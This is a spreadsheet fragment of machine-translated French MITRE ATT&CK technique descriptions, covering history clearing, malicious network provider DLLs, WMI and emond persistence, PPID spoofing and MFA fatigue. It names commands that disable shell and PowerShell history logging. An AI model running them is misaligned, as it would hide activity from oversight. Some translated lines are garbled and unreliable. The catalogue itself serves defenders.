Sous Linux et macOS, l’historique des commandes est suivi dans un fichier pointé par la variable &lt;code&gt;d’environnement HISTFILE.&lt;/code&gt; Lorsqu’un utilisateur se déconnecte d’un système, ces informations sont vidées dans un fichier appelé &lt;code&gt;~/.bash_history&lt;/code&gt; dans le répertoire personnel de l’utilisateur. La variable &lt;code&gt;d’environnement HISTCONTROL&lt;/code&gt; garde une trace de ce qui doit être sauvegardé par la commande &lt;code&gt;history&lt;/code&gt; et éventuellement dans le fichier &lt;code&gt;~/.bash_history&lt;/code&gt; lorsqu’un utilisateur se déconnecte. &lt;code&gt;HISTCONTROL&lt;/code&gt; n’existe pas par défaut sur macOS, mais peut être paramétré par l’utilisateur et sera respecté.
Les adversaires peuvent effacer la variable d’environnement historique (&lt;code&gt;désenclin HISTFILE)&lt;/code&gt; ou définir la taille de l’historique des commandes à zéro (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) pour empêcher l’enregistrement des commandes. De plus, &lt;code&gt;HISTCONTROL&lt;/code&gt; peut être configuré pour ignorer les commandes qui commencent par un espace en le définissant simplement sur « ignorespace ». &lt;code&gt;HISTCONTROL&lt;/code&gt; peut également être configuré pour ignorer les commandes en double en le réglant sur « ignoredups ». Dans certains systèmes Linux, cette définition est définie par défaut sur « ignoreboth », ce qui couvre les deux exemples précédents. Cela signifie que « ls » ne sera pas enregistré, mais « ls » sera sauvé par l’histoire. Les adversaires peuvent en abuser pour opérer sans laisser de traces en ajoutant simplement un espace à toutes leurs commandes terminales. 
Sur les systèmes Windows, le module &lt;code&gt;PSReadLine&lt;/code&gt; suit les commandes utilisées dans toutes les sessions PowerShell et les écrit dans un fichier (&lt;code&gt;$env :APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; par défaut). Les adversaires peuvent modifier l’emplacement d’enregistrement de ces journaux à l’aide &lt;code&gt;de Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. Cela &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; empêchera de recevoir les journaux. En outre, il est possible de désactiver la journalisation de ce fichier à l’aide de la commande PowerShell &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;. (Citation : Historique des commandes Microsoft PowerShell)(Citation : audit de commande Sophos PowerShell)(Citation : Sophos PowerShell Command History Forensics)
Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour désactiver la journalisation des commandes historiques (par exemple, &lt;code&gt;aucune journalisation&lt;/code&gt;).
https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer des bibliothèques de liens dynamiques (DLL) de fournisseur de réseau malveillantes pour capturer les informations d’identification de l’utilisateur en clair pendant le processus d’authentification. Les DLL des fournisseurs de réseau permettent à Windows de s’interfacer avec des protocoles réseau spécifiques et peuvent également prendre en charge des fonctions complémentaires de gestion des informations d’identification. (Citation : API du fournisseur de réseau) Pendant le processus de connexion, Winlogon (le module de connexion interactif) envoie des informations d’identification au processus local mpnotify.exe via RPC. Le processus mpnotify.exe partage ensuite les informations d’identification en clair avec les gestionnaires d’informations d’identification enregistrés lorsqu’il notifie qu’un événement d’ouverture de session se produit. (Citation : NPPSPY - Chasseresse)(Citation : Vidéo NPPSPY)(Citation : NPLogonNotify) 
Les adversaires peuvent configurer une DLL de fournisseur de réseau malveillante pour recevoir les informations d’identification de « mpnotify.exe ». (Citation : NPPSPY) Une fois installée en tant que gestionnaire d’informations d’identification (via le registre), une DLL malveillante peut recevoir et enregistrer des informations d’identification chaque fois qu’un utilisateur se connecte à un poste de travail ou à un domaine Windows via la fonction 'NPLogonNotify()'. (Citation : NPLogonNotify)
Les adversaires peuvent cibler l’implantation de DLL de fournisseurs de réseau malveillants sur des systèmes connus pour avoir une activité de connexion accrue et/ou une activité de connexion de l’administrateur, tels que des serveurs et des contrôleurs de domaine. (Citation : NPPSPY - Chasseresse)
https://attack.mitre.org/techniques/T1556/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et élever des privilèges en exécutant du contenu malveillant déclenché par un abonnement à un événement WMI (Windows Management Instrumentation). WMI peut être utilisé pour installer des filtres d’événements, des fournisseurs, des consommateurs et des liaisons qui exécutent du code lorsqu’un événement défini se produit. Des exemples d’événements auxquels il est possible d’être abonné sont l’heure de l’horloge murale, la connexion de l’utilisateur ou le temps de fonctionnement de l’ordinateur. (Citation : Mandiant M-Trends 2015)
Les adversaires peuvent utiliser les capacités de WMI pour s’abonner à un événement et exécuter du code arbitraire lorsque cet événement se produit, assurant ainsi la persistance sur un système. (Référence : FireEye WMI SANS 2015)(Référence : FireEye WMI 2015) Les adversaires peuvent également compiler des scripts WMI (à l’aide de « mofcomp.exe » dans des fichiers d’objets de gestion Windows (MOF) (extension .mof) qui peuvent être utilisés pour créer un abonnement malveillant. (Référence : Persistance de Dell WMI)(Citation : Microsoft MOF mai 2018)
L’exécution de l’abonnement WMI est assurée par le processus d’hôte du fournisseur WMI (WmiPrvSe.exe) et peut donc entraîner des privilèges SYSTEM élevés.
https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données de réseau de diffusion de contenu (CDN) sur les victimes qui peuvent être utilisées lors du ciblage. Les CDN permettent à une organisation d’héberger du contenu à partir d’un ensemble de serveurs distribués et à charge équilibrée. Les CDN peuvent également permettre aux organisations de personnaliser la diffusion de contenu en fonction de la région géographique du demandeur.
Les adversaires peuvent rechercher des données CDN pour recueillir des informations exploitables. Les acteurs de la menace peuvent utiliser des ressources en ligne et des outils de recherche pour recueillir des informations sur les serveurs de contenu au sein d’un CDN. Les adversaires peuvent également rechercher et cibler les erreurs de configuration du CDN qui divulguent des informations sensibles non destinées à être hébergées et/ou qui ne disposent pas des mêmes mécanismes de protection (par exemple, les portails de connexion) que le contenu hébergé sur le site Web de l’organisation. (Citation : CDN DigitalShadows) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou un accès initial (ex : [Passage intempestif Compromis](https://attack.mitre.org/techniques/T1189)).
https://attack.mitre.org/techniques/T1596/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses vérifications de l’activité des utilisateurs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adversaires peuvent rechercher l’activité de l’utilisateur sur l’hôte en fonction de variables telles que la vitesse/fréquence des mouvements de souris et des clics (Citation : Sans Virtual Jan 2016), l’historique du navigateur, le cache, les signets ou le nombre de fichiers dans des répertoires communs tels que la maison ou le bureau. D’autres méthodes peuvent s’appuyer sur une interaction spécifique de l’utilisateur avec le système avant que le code malveillant ne soit activé, comme attendre la fermeture d’un document avant d’activer une macro (Citation : Unit 42 Sofacy Nov 2018) ou attendre qu’un utilisateur double-clique sur une image intégrée pour l’activer. (Référence : FireEye FIN7 avril 2017)
https://attack.mitre.org/techniques/T1497/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter des applications SaaS (Software-as-a-Service) compromises pour effectuer des tâches gourmandes en ressources, ce qui peut avoir un impact sur la disponibilité des services hébergés. 
Par exemple, les adversaires peuvent exploiter les services de messagerie et de messagerie, tels que AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid et Twilio, afin d’envoyer de grandes quantités d’e-mails et de SMS de spam/[hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : Invictus IR DangerDev 2024)(Citation : Permiso SES Abuse 2023)(Citation : SentinelLabs SNS Sender 2024) Alternativement, ils peuvent s’engager dans le LLMJacking en exploitant des proxys inverses pour détourner la puissance des modèles d’IA hébergés dans le cloud. (Citation : Sysdig LLMJacking 2024)(Citation : Lacework LLMJacking 2024)
Dans certains cas, les adversaires peuvent tirer parti des services que la victime utilise déjà. Dans d’autres, en particulier lorsque le service fait partie d’une plate-forme cloud plus vaste, ils peuvent d’abord activer le service. (Citation : Sysdig LLMJacking 2024) L’exploitation d’applications SaaS peut entraîner des coûts financiers importants, l’utilisation de quotas de services et un impact sur la disponibilité.
https://attack.mitre.org/techniques/T1496/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des comptes auprès de fournisseurs de cloud qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes cloud pour poursuivre leurs opérations, notamment en exploitant des services de stockage cloud tels que Dropbox, MEGA, Microsoft OneDrive ou des compartiments AWS S3 pour [Exfiltration vers le stockage cloud](https://attack.mitre.org/techniques/T1567/002) ou vers [Outil de chargement](https://attack.mitre.org/techniques/T1608/002). Les comptes cloud peuvent également être utilisés dans l’acquisition d’infrastructures, telles que l’infrastructure [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003) ou l’infrastructure [Serverless](https://attack.mitre.org/techniques/T1583/007). L’établissement de comptes cloud peut permettre aux adversaires de développer des fonctionnalités sophistiquées sans gérer leurs propres serveurs. (Citation : Awake Security C2 Cloud)
La création de [comptes cloud](https://attack.mitre.org/techniques/T1585/003) peut également nécessiter que des adversaires créent des [comptes de messagerie](https://attack.mitre.org/techniques/T1585/002) pour s’enregistrer auprès du fournisseur de cloud.
https://attack.mitre.org/techniques/T1585/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux suites logicielles centralisées installées au sein d’une entreprise et les utiliser pour exécuter des commandes et se déplacer latéralement sur le réseau. Les applications de gestion de la configuration et de déploiement de logiciels peuvent être utilisées dans un réseau d’entreprise ou un environnement cloud à des fins d’administration courante. Ces systèmes peuvent également être intégrés dans des pipelines CI/CD. Des exemples de ces solutions incluent : SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc et GCP Deployment Manager.  
L’accès à un logiciel de gestion des terminaux à l’échelle du réseau ou de l’entreprise peut permettre à un adversaire d’exécuter du code à distance sur tous les systèmes connectés. L’accès peut être utilisé pour se déplacer latéralement vers d’autres systèmes, collecter des informations ou provoquer un effet spécifique, tel que l’effacement des disques durs sur tous les terminaux.
Les services de gestion de configuration basés sur SaaS peuvent permettre une large [Cloud Administration Command](https://attack.mitre.org/techniques/T1651) sur des instances hébergées dans le cloud, ainsi que l’exécution de commandes arbitraires sur des points de terminaison locaux. Par exemple, Microsoft Configuration Manager permet aux administrateurs globaux ou Intune d’exécuter des scripts en tant que SYSTEM sur des appareils locaux joints à Entra ID. (Citation : Déplacement latéral de SpecterOps d’Azure vers AD sur site 2020) Ces services peuvent également utiliser [Web Protocols](https://attack.mitre.org/techniques/T1071/001) pour communiquer avec l’infrastructure appartenant à l’adversaire. (Citation : Avis de sécurité Mitiga : l’agent SSM en tant que cheval de Troie d’accès à distance)
Les périphériques d’infrastructure réseau peuvent également disposer d’outils de gestion de la configuration qui peuvent être utilisés de la même manière par des adversaires. (Citation : Fortinet zero-day et un logiciel malveillant personnalisé utilisé par un acteur chinois présumé dans une opération d’espionnage)
Les autorisations requises pour cette action varient en fonction de la configuration du système ; Les informations d’identification locales peuvent être suffisantes pour un accès direct au système tiers, ou des informations d’identification de domaine spécifiques peuvent être requises. Cependant, le système peut nécessiter un compte administratif pour se connecter ou pour accéder à des fonctionnalités spécifiques.
https://attack.mitre.org/techniques/T1072</t>
  </si>
  <si>
    <t>Les adversaires peuvent voler des données en les exfiltrant via un canal de commande et de contrôle existant. Les données volées sont codées dans le canal de communication normal en utilisant le même protocole que les communications de commande et de contrôle.
https://attack.mitre.org/techniques/T1041</t>
  </si>
  <si>
    <t>Les adversaires peuvent usurper l’identificateur de processus parent (PPID) d’un nouveau processus pour contourner les défenses de surveillance des processus ou pour élever les privilèges. Les nouveaux processus sont généralement générés directement à partir de leur processus parent, ou appel, sauf indication explicite. L’une des façons d’attribuer explicitement le PPID d’un nouveau processus consiste à utiliser l’appel d’API &lt;code&gt;CreateProcess&lt;/code&gt;, qui prend en charge un paramètre définissant le PPID à utiliser. (Citation : DidierStevens SelectMyParent novembre 2009) Cette fonctionnalité est utilisée par les fonctionnalités Windows telles que le contrôle de compte d’utilisateur (UAC) pour définir correctement le PPID après qu’un processus élevé demandé est généré par SYSTEM (généralement via &lt;code&gt;svchost.exe&lt;/code&gt; ou &lt;code&gt;consent.exe&lt;/code&gt;) plutôt que le contexte utilisateur actuel. (Citation : Microsoft UAC novembre 2018)
Les adversaires peuvent abuser de ces mécanismes pour échapper aux défenses, telles que le blocage des processus générés directement à partir de documents Office et l’analyse ciblant des relations de processus parent-enfant inhabituelles/potentiellement malveillantes, telles que l’usurpation du PPID de [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) pour être &lt;code&gt;explorer.exe&lt;/code&gt; plutôt qu’un document Office livré dans le cadre de [Pièce jointe pour spearphishing](https://attack.mitre.org/techniques/T1566/001). (Citation : CounterCept PPID Spoofing décembre 2018) Cette usurpation d’identité peut être exécutée via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) dans un document Office malveillant ou tout code capable d’exécuter [API native](https://attack.mitre.org/techniques/T1106). (Citation : CTD PPID Spoofing Macro mars 2019)(Citation : CounterCept PPID Spoofing décembre 2018)
L’attribution explicite du PPID peut également activer des privilèges élevés avec des droits d’accès appropriés au processus parent. Par exemple, un adversaire dans un contexte d’utilisateur privilégié (c’est-à-dire un administrateur) peut générer un nouveau processus et affecter le parent en tant que processus s’exécutant en tant que SYSTEM (par exemple, &lt;code&gt;lsass.exe&lt;/code&gt;), ce qui entraîne une élévation de niveau élevé du nouveau processus via le jeton d’accès hérité. (Citation : XPNSec PPID novembre 2017)
https://attack.mitre.org/techniques/T1134/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur l’organisation de la victime qui peuvent être utilisées lors du ciblage. Les renseignements sur une organisation peuvent comprendre divers détails, notamment les noms des divisions ou des services, les détails des activités commerciales, ainsi que les rôles et responsabilités des employés clés.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les renseignements sur une organisation peuvent également être exposés à des adversaires par le biais d’outils en ligne ou d’autres ensembles de données accessibles (p. ex., [médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite ThreatPost Broadvoice)(Référence : SEC EDGAR Search) La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), l’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou un accès initial (ex : [Phishing]( https://attack.mitre.org/techniques/T1566) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591</t>
  </si>
  <si>
    <t>Les adversaires peuvent falsifier des documents d’identification qui peuvent être utilisés pour accéder à des applications Web ou à des services Internet. Les applications et services Web (hébergés dans des environnements SaaS cloud ou des serveurs sur site) utilisent souvent des cookies de session, des jetons ou d’autres éléments pour authentifier et autoriser l’accès des utilisateurs.
Les adversaires peuvent générer ces informations d’identification afin d’accéder aux ressources Web. Cela diffère de [Voler le cookie de session Web](https://attack.mitre.org/techniques/T1539), [Voler le jeton d’accès à l’application](https://attack.mitre.org/techniques/T1528) et d’autres comportements similaires en ce sens que les informations d’identification sont nouvelles et falsifiées par l’adversaire, plutôt que volées ou interceptées auprès d’utilisateurs légitimes.
La génération d’informations d’identification Web nécessite souvent des valeurs secrètes, telles que des mots de passe, des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou d’autres valeurs de départ cryptographiques. (Citation : GitHub AWS-ADFS-Credential-Generator) Les adversaires peuvent également falsifier des jetons en tirant parti de fonctionnalités telles que les API « AssumeRole » et « GetFederationToken » dans AWS, qui permettent aux utilisateurs de demander des informations d’identification de sécurité temporaires (c’est-à-dire, [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), ou la commande « zmprov gdpak » dans Zimbra, qui génère une clé de pré-authentification qui peut être utilisée pour générer des jetons pour n’importe quel utilisateur du domaine. (Référence : Informations d’identification de sécurité temporaires AWS)(Citation : Zimbra Preauth)
Une fois falsifiés, les adversaires peuvent utiliser ces identifiants Web pour accéder à des ressources (ex : [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550)), qui peuvent contourner les mécanismes de protection contre l’authentification multifactorielle et autres. (Citation : Passez le cookie)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019)(Citation : Guide client de Microsoft SolarWinds)
https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de contourner les mécanismes d’authentification multifacteur (MFA) et d’accéder aux comptes en générant des demandes MFA envoyées aux utilisateurs.
Les adversaires en possession d’informations d’identification pour [Comptes valides](https://attack.mitre.org/techniques/T1078) peuvent ne pas être en mesure de terminer le processus de connexion s’ils n’ont pas accès aux mécanismes 2FA ou MFA requis en tant qu’informations d’identification supplémentaires et contrôle de sécurité. Pour contourner ce problème, les adversaires peuvent abuser de la génération automatique de notifications push vers des services MFA tels que Duo Push, Microsoft Authenticator, Okta ou des services similaires pour que l’utilisateur accorde l’accès à son compte. Si les adversaires ne disposent pas des informations d’identification des comptes victimes, ils peuvent également abuser de la génération automatique de notifications push lorsque cette option est configurée pour la réinitialisation de mot de passe en libre-service (SSPR). (Citation : Abus d’obsidienne SSPR 2023)
Dans certains cas, les adversaires peuvent répéter continuellement les tentatives de connexion afin de bombarder les utilisateurs de notifications push MFA, de SMS et d’appels téléphoniques, ce qui peut amener l’utilisateur à accepter la demande d’authentification en réponse à la « fatigue MFA ». (Citation : Contrariété russe 2FA Push - Cimpanu)(Citation : Attaques de fatigue MFA - PortSwigger)(Citation : Activité russe présumée ciblant des entités gouvernementales et commerciales dans le monde entier)
https://attack.mitre.org/techniques/T1621</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les fichiers binaires des logiciels hôtes pour établir un accès permanent aux systèmes. Les fichiers binaires/exécutables logiciels fournissent un large éventail de commandes ou de services système, de programmes et de bibliothèques. Les binaires logiciels courants sont les clients SSH, les clients FTP, les clients de messagerie, les navigateurs Web et de nombreuses autres applications utilisateur ou serveur.
Les adversaires peuvent établir une persistance en modifiant les fichiers binaires du logiciel hôte. Par exemple, un adversaire peut remplacer ou infecter un fichier binaire d’application légitime (ou des fichiers de support) par une porte dérobée. Étant donné que ces fichiers binaires peuvent être exécutés régulièrement par les applications ou l’utilisateur, l’adversaire peut en tirer parti pour obtenir un accès persistant à l’hôte. Un adversaire peut également modifier un binaire logiciel tel qu’un client SSH afin de collecter de manière persistante des informations d’identification lors des connexions (c’est-à-dire, [Modifier le processus d’authentification](https://attack.mitre.org/techniques/T1556)). (Référence : Google Cloud Mandiant UNC3886 2024)
Un adversaire peut également modifier un binaire existant en y ajoutant des correctifs de fonctionnalités malveillantes (par exemple, IAT Hooking/Entry point patching) (Citation : Unit42 Banking Trojans Hooking 2022) avant l’exécution légitime du binaire. Par exemple, un adversaire peut modifier le point d’entrée d’un fichier binaire pour pointer vers un code malveillant corrigé par l’adversaire avant de reprendre le flux d’exécution normal. (Citation : ESET FontOnLake Analysis 2021)
Après avoir modifié un binaire, un adversaire peut tenter de [Nuire aux défenses](https://attack.mitre.org/techniques/T1562) en l’empêchant de se mettre à jour (par exemple, via la commande 'yum-versionlock' ou le fichier 'versionlock.list' dans les systèmes Linux qui utilisent le gestionnaire de paquets yum). (Référence : Google Cloud Mandiant UNC3886 2024)
https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter directement des informations d’identification non sécurisées stockées ou transmises par le biais des services de communication avec les utilisateurs. Les informations d’identification peuvent être envoyées et stockées dans des applications de communication par chat utilisateur telles que les e-mails, des services de chat tels que Slack ou Teams, des outils de collaboration tels que Jira ou Trello, et tout autre service prenant en charge la communication avec les utilisateurs. Les utilisateurs peuvent partager diverses formes d’informations d’identification (telles que des noms d’utilisateur et des mots de passe, des clés API ou des jetons d’authentification) sur des canaux de communication internes d’entreprise privés ou publics.
Plutôt que d’accéder aux journaux de chat stockés (c’est-à-dire [Informations d’identification dans les fichiers](https://attack.mitre.org/techniques/T1552/001)), les adversaires peuvent accéder directement aux informations d’identification de ces services sur le point de terminaison de l’utilisateur, via des serveurs hébergeant les services ou via des portails d’administrateur pour les services hébergés dans le cloud. Les adversaires peuvent également compromettre les outils d’intégration tels que les flux de travail Slack pour rechercher automatiquement dans les messages afin d’extraire les informations d’identification de l’utilisateur. Ces informations d’identification peuvent ensuite être utilisées de manière abusive pour effectuer des activités de suivi telles que le mouvement latéral ou l’élévation de privilèges (Citation : Slack Security Risks).
https://attack.mitre.org/techniques/T1552/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des commandes et des scripts PowerShell pour l’exécution. PowerShell est une interface de ligne de commande interactive puissante et un environnement de script inclus dans le système d’exploitation Windows. (Citation : TechNet PowerShell) Les adversaires peuvent utiliser PowerShell pour effectuer un certain nombre d’actions, notamment la découverte d’informations et l’exécution de code. Il s’agit par exemple de l’applet &lt;code&gt;de commande Start-Process&lt;/code&gt;, qui peut être utilisée pour exécuter un exécutable, et de l’applet &lt;code&gt;de commande Invoke-Command&lt;/code&gt;, qui exécute une commande localement ou sur un ordinateur distant (bien que des autorisations d’administrateur soient requises pour utiliser PowerShell pour se connecter à des systèmes distants).
PowerShell peut également être utilisé pour télécharger et exécuter des exécutables à partir d’Internet, qui peuvent être exécutés à partir du disque ou en mémoire sans toucher le disque.
Un certain nombre d’outils de test offensif basés sur PowerShell sont disponibles, notamment [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378) et PSAttack. (Citation : Github PSAttack)
Les commandes/scripts PowerShell peuvent également être exécutés sans appeler directement le binaire &lt;code&gt;powershell.exe&lt;/code&gt; via les interfaces de la DLL d’assembly &lt;code&gt;System.Management.Automation&lt;/code&gt; sous-jacente de PowerShell exposée via le cadre .NET et l’interface de ligne de commande Windows Common Language Interface. (Citation : Sixdub PowerPick janvier 2016)(Citation : SilentBreak Offensive PS décembre 2015)(Citation : Microsoft PSfromCsharp APR 2014)
https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir la persistance en exécutant du contenu malveillant déclenché par une association de type de fichier. Lorsqu’un fichier est ouvert, le programme par défaut utilisé pour ouvrir le fichier (également appelé association de fichiers ou gestionnaire) est vérifié. Les sélections d’association de fichiers sont stockées dans le registre Windows et peuvent être modifiées par les utilisateurs, les administrateurs ou les programmes qui ont accès au registre ou par les administrateurs à l’aide de l’utilitaire associé intégré. (Citation : Microsoft Change Default Programs)(Citation : Gestionnaires de fichiers Microsoft)(Citation : Microsoft Assoc octobre 2017) Les applications peuvent modifier l’association de fichiers pour une extension de fichier donnée afin d’appeler un programme arbitraire lorsqu’un fichier avec l’extension donnée est ouvert.
Les associations de fichiers système sont répertoriées sous &lt;code&gt;HKEY_CLASSES_ROOT\.[ extension]&lt;/code&gt;, par exemple &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. Les entrées pointent vers un gestionnaire pour cette extension situé dans &lt;code&gt;HKEY_CLASSES_ROOT\\[handler].&lt;/code&gt; Les différentes commandes sont ensuite listées en tant que sous-clés sous la clé shell au &lt;code&gt;niveau de HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command.&lt;/code&gt; Par exemple: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
Les valeurs des clés répertoriées sont des commandes qui sont exécutées lorsque le gestionnaire ouvre l’extension de fichier. Les adversaires peuvent modifier ces valeurs pour exécuter en permanence des commandes arbitraires. (Citation : TrendMicro TROJ-FAKEAV OCTOBRE 2012)
https://attack.mitre.org/techniques/T1546/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans les processus par le biais du détournement VDSO afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le détournement d’objets virtuels dynamiques partagés (vdso) est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Le détournement VDSO consiste à rediriger les appels vers des bibliothèques partagées liées dynamiquement. Les protections de mémoire peuvent empêcher l’écriture de code exécutable dans un processus via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). Toutefois, un adversaire peut détourner les stubs de code de l’interface syscall mappés dans un processus à partir de l’objet partagé vdso pour exécuter des appels système afin d’ouvrir et de mapper un objet partagé malveillant. Ce code peut ensuite être appelé en redirigeant le flux d’exécution du processus via des références d’adresses de mémoire corrigées stockées dans la table de décalage globale d’un processus (qui stockent les adresses absolues des fonctions de bibliothèque mappées). (Citation : Injection ELF mai 2009)(Citation : Backtrace VDSO)(Référence : VDSO août 2005)(Citation : Syscall 2014)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution via le détournement VDSO peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application associés au transfert de fichiers pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que SMB (Citation : US-CERT TA18-074A), FTP (Citation : ESET Machete juillet 2019), FTPS et TFTP qui transfèrent des fichiers peuvent être très courants dans les environnements.  Les paquets produits à partir de ces protocoles peuvent comporter de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Les données peuvent également être dissimulées dans les fichiers transférés. Un adversaire peut abuser de ces protocoles pour communiquer avec les systèmes sous son contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu.
https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les vulnérabilités logicielles pour tenter de collecter des informations d’identification. L’exploitation d’une vulnérabilité logicielle se produit lorsqu’un adversaire profite d’une erreur de programmation dans un programme, un service ou dans le logiciel ou le noyau du système d’exploitation lui-même pour exécuter du code contrôlé par l’adversaire. 
Les mécanismes d’accréditation et d’authentification peuvent être exploités par des adversaires comme moyen d’accéder à des informations d’identification utiles ou de contourner le processus pour obtenir un accès authentifié aux systèmes. Par exemple, « MS14-068 », qui cible Kerberos et peut être utilisé pour falsifier des tickets Kerberos à l’aide des autorisations des utilisateurs du domaine. (Référence : Technet MS14-068)(Citation : ADSecurity détecte les tickets falsifiés) Un autre exemple de cela est les attaques par rejeu, dans lesquelles l’adversaire intercepte des paquets de données envoyés entre les parties, puis rejoue ensuite ces paquets. Si les services ne valident pas correctement les demandes d’authentification, ces paquets rejoués peuvent permettre à un adversaire d’usurper l’identité de l’une des parties et d’obtenir un accès ou des privilèges non autorisés. (Citation : Bugcrowd Replay Attack)(citation : Comparitech Replay Attack)(Citation : Microsoft Midnight Blizzard Replay Attack)
Une telle exploitation a également été démontrée dans les environnements cloud. Par exemple, des adversaires ont exploité des vulnérabilités dans l’infrastructure de cloud public qui ont permis la création et le renouvellement involontaires de jetons d’authentification. (Citation : Techniques Storm-0558 pour l’accès non autorisé aux e-mails)
L’exploitation pour l’accès aux informations d’identification peut également entraîner une élévation de privilèges en fonction du processus ciblé ou des informations d’identification obtenues.
https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir de la persistance et des privilèges élevés en exécutant du contenu malveillant déclenché par le démon du moniteur d’événements (emond). Emond est un [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) qui accepte les événements de divers services, les exécute via un simple moteur de règles et prend des mesures. Le binaire emond de &lt;code&gt;/sbin/emond&lt;/code&gt; chargera toutes les règles du répertoire &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; et agira une fois qu’un événement explicitement défini aura lieu.
Les fichiers de règles sont au format plist et définissent le nom, le type d’événement et l’action à entreprendre. Parmi les exemples de types d’événements, citons le démarrage du système et l’authentification de l’utilisateur. Des exemples d’actions consistent à exécuter une commande système ou à envoyer un e-mail. Le service emond ne se lancera pas s’il n’y a pas de fichier présent dans le chemin d’accès aux Répertoires de file d’attente &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, spécifié dans le fichier de configuration [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;. (Citation : xorrior emond Jan 2018)(Citation : magnusviri emond avril 2016)(Citation : sentinelone macos persist juin 2019)
Les adversaires peuvent abuser de ce service en écrivant une règle pour exécuter des commandes lorsqu’un événement défini se produit, tel que le démarrage du système ou l’authentification de l’utilisateur. (Citation : xorrior emond Jan 2018)(Citation : magnusviri emond avril 2016)(Citation : sentinelone macos persist juin 2019) Les adversaires peuvent également être en mesure d’élever les privilèges de l’administrateur à la racine, car le service emond est exécuté avec les privilèges root par le service [Launch Daemon](https://attack.mitre.org/techniques/T1543/004).
